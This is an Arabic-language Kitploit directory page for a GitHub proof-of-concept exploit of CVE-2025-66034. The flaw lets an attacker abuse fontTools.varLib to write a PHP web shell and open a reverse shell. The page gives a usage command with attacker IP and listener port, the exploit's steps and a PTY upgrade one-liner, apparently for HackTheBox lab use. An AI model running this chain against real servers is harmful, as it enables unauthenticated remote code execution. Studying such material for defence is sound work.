Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib ثغرة كتابة ملفات عشوائية → RCE استغلال PoC لثغرة كتابة ملفات عشوائية + حقن XML في fontTools.varLib. | Kitploit
أدوات/GitHubGitHub/4nuxd/cve-2025-66034
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقتطوير الحمولات
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib ثغرة كتابة ملفات عشوائية → RCE استغلال PoC لثغرة كتابة ملفات عشوائية + حقن XML في fontTools.varLib.

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-66034 — fontTools varLib كتابة ملف تعسفي → تنفيذ تعليمات برمجية عن بعد (RCE)

إثبات مفهوم لاستغلال ثغرة كتابة ملف تعسفي + حقن XML في fontTools.varLib تم اختباره على HackTheBox — VarIaType


الثغرة

يقوم fontTools.varLib بمعالجة ملفات XML .designspace لبناء خطوط متغيرة. تجتمع نقطتا ضعف لتحقيق RCE دون مصادقة:

#البدائيةالتفاصيل
1حقن XML عبر تقسيم CDATAتتم كتابة المحتوى الذي يتحكم به المهاجم داخل <labelname> حرفيًا في جسم ملف الخط الناتج، مما يسمح بحقن بيانات تعسفية
2كتابة ملف تعسفي عبر تجاوز os.path.join()تقبل سمة filename لعنصر <variable-font> مسارًا مطلقًا. عند تمريرها إلى os.path.join()، فإنها تتجاهل دليل الإخراج المقصود وتكتب إلى أي مسار نظام ملفات يحدده المهاجم

يتيح ربط كلتا البدائيتين كتابة قشرة ويب PHP إلى مسار يمكن الوصول إليه عبر الويب، مما يحقق تنفيذ تعليمات برمجية عن بعد غير مصادق عليه.


الاستخدام

root@kitploit:~
python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

الخيارات

العلامةالوصف
--ipعنوان IP للمهاجم لرد الاتصال بالقشرة العكسية
--portمنفذ المستمع
--uploadعنوان URL الكامل لنقطة نهاية معالجة الخط (POST)
--webrootمسار مطلق من جانب الخادم يتوافق مع دليل يمكن الوصول إليه عبر الويب
--shellعنوان URL الأساسي الذي ستكون القشرة الويب متاحة تحته
--no-listenتخطي المستمع التلقائي — طباعة الأوامر اليدوية بدلاً من ذلك
--pwncatاستخدم pwncat-cs بدلاً من nc (مفضل إذا كان متاحًا)

التبعيات

root@kitploit:~
pip install requests fonttools

كيفية العمل

  1. الخطوط الرئيسية — يتم إنشاء ملفين .ttf بسيطين (source-light.ttf, source-regular.ttf) باستخدام fontTools.FontBuilder كخطوط رئيسية مطلوبة لمساحة التصميم
  2. ملف .designspace خبيث — يتم بناء ملف XML مصمم بـ:
    • قشرة ويب PHP محقونة عبر تقسيم CDATA داخل <labelname>
    • مسار كتابة مطلق مضبوط كـ filename لعنصر <variable-font>، متجاوزًا output_dir عبر os.path.join()
  3. الرفع — يتم إرسال ملف .designspace + الخطوط الرئيسية عبر POST إلى نقطة نهاية المعالجة
  4. التشغيل — يتم طلب ملف .php المزروع، مما ينفذ حمولة القشرة العكسية
  5. ترقية TTY — عند الاتصال، يقوم البرنامج النصي تلقائيًا بإنشاء PTY عبر python3 -c 'import pty; pty.spawn("/bin/bash")' وتعيين TERM + stty للحصول على قشرة تفاعلية كاملة

الإفصاح

الحقل
CVECVE-2025-66034
المكون المتأثرfontTools.varLib
التأثيركتابة ملف تعسفي غير مصادق → تنفيذ تعليمات برمجية عن بعد
السياقتطبيق ويب يعرض نقطة نهاية معالجة الخطوط

قانوني

هذه الأداة مخصصة فقط لاختبار الاختراق المصرح به واستخدام مسابقات CTF. لا تقم بتشغيلها ضد أنظمة لا تمتلكها أو ليس لديك إذن كتابي صريح لاختبارها.


بواسطة 4nuxd

تنزيل الأداة